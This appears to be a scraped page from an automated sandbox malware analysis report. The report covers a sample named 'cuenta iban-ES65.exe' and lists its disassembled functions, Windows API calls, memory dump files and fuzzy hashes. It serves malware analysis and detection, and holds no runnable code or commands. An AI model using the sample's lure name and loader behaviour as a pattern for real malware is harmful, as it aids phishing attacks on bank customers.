Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 819798dc53cfa1cdbbfc5d7e08787ba6897a8f53220b076d06f42c99be0ae6da
Instruction ID: 8b304e13c4ff4e58b2746d459b27b343ece49c0a97bab20a5a043a2c5b6af2c1
Opcode Fuzzy Hash: 819798dc53cfa1cdbbfc5d7e08787ba6897a8f53220b076d06f42c99be0ae6da
Instruction Fuzzy Hash: DEF0E577A082905FEB15CB64EDC086D7BF2EB8631075445BBD101A3691C2785C08C728

Uniqueness

Uniqueness Score: -1.00%

Function 004060A5 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
GetProcAddress.KERNEL32(00000000,?), ref: 004060D2

Part of subcall function 00406037: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040604E
Part of subcall function 00406037: wsprintfA.USER32 ref: 00406087
Part of subcall function 00406037: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040609B

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction ID: 3e97459997e7f7d7039c0cd31b40a13ca7cd82e20333033f2d5c91e802436a08
Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
Instruction Fuzzy Hash: 9DE08632644121AAD32097749E0493B72ACAA84751302093EF506F2180D7389C21A669

Uniqueness

Uniqueness Score: -1.00%

Function 0040597F Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\cuenta iban-ES65.exe,80000000,00000003), ref: 00405983
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26

Uniqueness

Uniqueness Score: -1.00%

Function 00405468 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004030DF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040546E
GetLastError.KERNEL32 ref: 0040547C

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction ID: c55d8aa437131a95a01de78b0052dcd3d9cc3f447ee629d771dafcce0f52932c
Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
Instruction Fuzzy Hash: F5C04C30719601EAD6205B609E08B5B7D54AB54742F1045756546E10F0D6749451D92E

Uniqueness

Uniqueness Score: -1.00%

Function 0040255C Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
Instruction ID: 2ad6ade0dd87bb00519d913a8aa863536615c58d60cd2f1651ee4e1b5922b607
Opcode Fuzzy Hash: 2b3f0152387d06df6eaf096f135fad1e6c25d68e51a67a505a4e16ce5121cf03
Instruction Fuzzy Hash: D321DB70C04295BEDF318B584A985AF7B749B11314F1484BBE891B62D1C1BD8A85EB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00402616 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402630

Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
Instruction ID: 8aac78d75a064c4630454a8a93e19dff4664e4603579630d9101515f905a40da
Opcode Fuzzy Hash: 605c8d6a649ef785eb1d6a94470a00a99215b591ffdd9e56fcea621c1e02c6b1
Instruction Fuzzy Hash: 56E01A76A05640AAE701B7A5AE89CBE636ADB50318B20853BF601B00C1C6BD89059A3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: b9d7ae82dfceeebafb3c3a0508530cee58bb4de42ef2dd8ecfa1f3aabca50655
Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
Opcode Fuzzy Hash: b9d7ae82dfceeebafb3c3a0508530cee58bb4de42ef2dd8ecfa1f3aabca50655
Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,0000057F,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
Instruction ID: f02d1f32d416435064830634415e16150983832f9e15cf27d1a8645227483e3a
Opcode Fuzzy Hash: eded891075ee9d68bdfa7caca34f4ecd2b61e9434e1da65918f8acfe225afcc1
Instruction Fuzzy Hash: 6EE0E676250108BFD700DFA9DD47FD577ECE758745F008421B609D7095C774E5508B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405A26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,00403057,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,?,00000000), ref: 00405A3A

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: 202e9d0092b88ed1e300126467a6d0629c49e9ab1c26cc5f9aac99f6baf52130
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: FFE0EC3261425AAFDF10AEA59C44EEB7B6CFB05360F008533F915E2550D231E921DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004059F7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,000000FF,?,004030A1,00000000,00000000,00402EEE,000000FF,?,00000000,00000000,00000000), ref: 00405A0B

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction ID: ec62d6923e01247a1983afaeae7cc56c043784b3a51a97a909eefe23b1c45cc9
Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction Fuzzy Hash: CFE04F32210259AFCF10AE549C40EAB375CEB04250F004432F915E2040D230E8119FA8

Uniqueness

Uniqueness Score: -1.00%

Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000404C,?,00000040,1000403C), ref: 10002729

Memory Dump Source

Source File: 00000000.00000002.13169077201.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.13169049421.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169106504.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.13169135539.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_cuenta iban-ES65.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19

Uniqueness

Uniqueness Score: -1.00%

Function 004022C7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
Instruction ID: 39f1f9859769fa242ff58571ca275c021542d1dfaf63d46caa25723865460d27
Opcode Fuzzy Hash: 89032baceb3f6f114b0488ce247a90a0ba58f85f764d13967e355b5ac32f42df
Instruction Fuzzy Hash: 66E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB849419B1D

Uniqueness

Uniqueness Score: -1.00%

Function 00403F3D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(000103AE,00000000,00000000,00000000), ref: 00403F4F

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13146430325.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_cuenta iban-ES65.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
Instruction ID: 9b9c13dac3056517ae90cab9ba0900707a7cdbddb9b58ac83e38e750941f619c
Opcode Fuzzy Hash: fe9c5fbe97cae241cde84ce22785a5e9dbc0b02d0b9d793388d9d8a90b417260
Instruction Fuzzy Hash: 39C04C71A442016AEB219B649D49F067BA8A751701F1594257315A50E0D674E410D66D

Uniqueness

Uniqueness Score: -1.00%

Function 00403F26 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34

Memory Dump Source

Source File: 00000000.00000002.13145407440.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.13145364564.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145453641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.13145500169.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
